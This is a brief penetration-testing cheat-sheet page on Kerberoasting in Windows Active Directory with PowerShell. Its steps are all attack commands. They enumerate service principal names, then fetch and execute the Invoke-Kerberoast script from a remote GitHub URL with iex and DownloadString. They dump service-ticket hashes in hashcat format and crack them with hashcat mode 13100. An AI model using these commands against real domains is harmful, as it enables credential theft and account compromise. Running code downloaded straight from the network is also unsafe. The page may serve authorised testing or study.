Kerberoasting using Powershell

foothold, windows, ad, kerberos, powershell

Overview #

This will request a service ticket for an account and acquire a hash using powershell.

Requirement #

Steps #

setspn -T medin -Q */*
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')
Invoke-Kerberoast -OutputFormat hashcat |fl

hashcat -m 13100 - a 0 hash.txt wordlist --force

Alternative #